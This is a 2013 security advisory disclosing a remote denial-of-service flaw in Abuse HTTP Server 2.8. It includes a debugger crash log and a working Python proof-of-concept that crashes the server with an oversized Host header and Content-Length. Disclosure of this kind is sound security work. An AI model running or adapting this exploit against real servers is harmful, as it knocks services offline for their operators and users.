Advisory Information :
======================
Title : Abuse HTTP Server 2.8 - Remote Denial Of Service
Advisory ID : Cr02013-002
Product : HTTP Server
Vendor : SmartUX
Vulnerable Version(s) : 2.8 and probably prior release
Tested Version : 2.8
Tested On : Windows XP, Windows 7
Vulnerability Type / CWE ID : Improper Resource Shutdown or Release / [CWE-404]
Risk Level : High
CVSSv2 Base Score : 9.7 (AV:N/AC:L/Au:N/C:N/I:P/A:C/E:F/RL:U/RC:C/CDP:LM/TD:H/CR:L/IR:L/AR:H)
Discovered By : Zico (Zee Eichel) Ekel of cr0security - zee[at]cr0security.com - http://www.cr0security.com
Introduction :
==============
Abuse HTTP Server is a small program designed to become a WebServer.
- Based on / Copied from : http://abuse-httpd.sourceforge.net/
Advisory Details:
=================
Abuse HTTP Server suffers from Remote Denial Of Service (DOS). The Attacker could make Abuse HTTP Server disconnect connection while client is connected to Abuse HTTP server.
Proof Of Concept :
==================
The Attacker run this remote exploit DOS code targeted to remote server host,
and the connection between server and android client will be disconected or terminated.
With debugging (Log-using ollydbg) :
Log data, item 3
Address=7C8106E9 (crash address)
Message=New thread with ID 000006D0 created
Log data, item 2
Message=Thread 000006D0 terminated, exit code 0
Log data, item 1
Message=Thread 00000794 terminated, exit code CB (203.)
Log data, item 0
Message=Process terminated, exit code CB (203.)
Register FPU log :
EAX 00000000
ECX 7C800000 kernel32.7C800000
EDX 7C97B120 ntdll.7C97B120
EBX 00000000
ESP 0012EDD4
EBP 0012EED0
ESI 7C90DE50 ntdll.ZwTerminateProcess
EDI 000000CB
EIP 7C90E4F4 ntdll.KiFastSystemCallRet
C 0 ES 0023 32bit 0(FFFFFFFF)
P 1 CS 001B 32bit 0(FFFFFFFF)
A 0 SS 0023 32bit 0(FFFFFFFF)
Z 1 DS 0023 32bit 0(FFFFFFFF)
S 0 FS 003B 32bit 7FFDE000(FFF)
T 0 GS 0000 NULL
D 0
O 0 LastErr ERROR_CLASS_HAS_WINDOWS (00000584)
EFL 00000246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty -??? FFFF 00FF00FF 00FF00FF
ST1 empty -??? FFFF 00FF00FF 00FF00FF
ST2 empty -??? FFFF 00FE00B2 006E007A
ST3 empty -??? FFFF 00FE00B2 006B0077
ST4 empty -NAN FFFF FFB36B77 FFB36E7A
ST5 empty -??? FFFF 00FF00B3 006B0077
ST6 empty -??? FFFF 00000000 00000000
ST7 empty -??? FFFF 00800080 00800080
3 2 1 0 E S P U O Z D I
FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)
FCW 1372 Prec NEAR,64 Mask 1 1 0 0 1 0
SEH chain of main thread:
Address SE handler
0012FC50 kernel32.7C839AC0
0012FCA8 Abuse.0040D7E3
0012FD78 USER32.7E44048F
0012FDD8 USER32.7E44048F
0012FEF0 USER32.7E44048F
0012FF50 USER32.7E44048F
0012FFE0 kernel32.7C839AC0
Sample dummy tool for disconected only
======================================
--- Python Remote DOS code ---
#!/usr/bin/python
import socket
import os
import sys
crash = "0" * 504
buffer="GET / HTTP/1.1\r\n"
buffer+="Host: " + crash + "\r\n"
buffer+="Content-Type: application/x-www-form-urlencoded\r\n"
buffer+="User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1\r\n"
buffer+="Content-Length : 1048580\r\n\r\n"
print "[*] Exploit c0ded by Zee Eichel - zee[at]cr0security.com"
print "[*] Change some option in code with your self"
print "[*] Connect to host and send payload"
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect(("192.168.1.101", 80))
expl.send(buffer)
print "[*] Server Disconected"
expl.close()
------------- EOF -------------
Report-Timeline :
=================
29/09/2013 : Vendor Contacted / No response.
30/09/2013 : Public Disclosure.
Remediation :
=============
There isn't remediation step from the Vendor until this Public Disclosure.
References :
============
- Common Weakness Enumeration (CWE) - http://cwe.mitre.org
- Share KM - http://abuse-httpd.sourceforge.net/
About Cr0security :
===================
Cr0security is a company that moved on "Information and Technologies" especially
on Computer Security System, Network Security, and Secure Computer Application
Development. with a reference to the publics needs of using the information system
technology with better security, Cr0security ready to help you to reach secure point
and creating a comfortable moment while you are perform any activities through your
networks or computers at once. In computer software development we also implement the
"Secure Programming". so security of the applications, the data, and the computer will
be strictly maintained. Beside we can act as your Consultant, We can act as your partner
to achieve the best solution.
Contact Cr0security :
=====================
Email : info[at]cr0security.com
Website : http://www.cr0security.com
Disclaimer :
============
The information provided in this advisory is provided "as is" without warranty
of any kind. Cr0security disclaims all warranties, either express or implied,
including the warranties of merchantability and fitness for a particular purpose.
In no event shall Cr0security or its suppliers be liable for any damages whatsoever
including direct, indirect, incidental, consequential, loss of business profits or
special damages, even if Cr0security or its suppliers have been advised of the
possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may
not apply.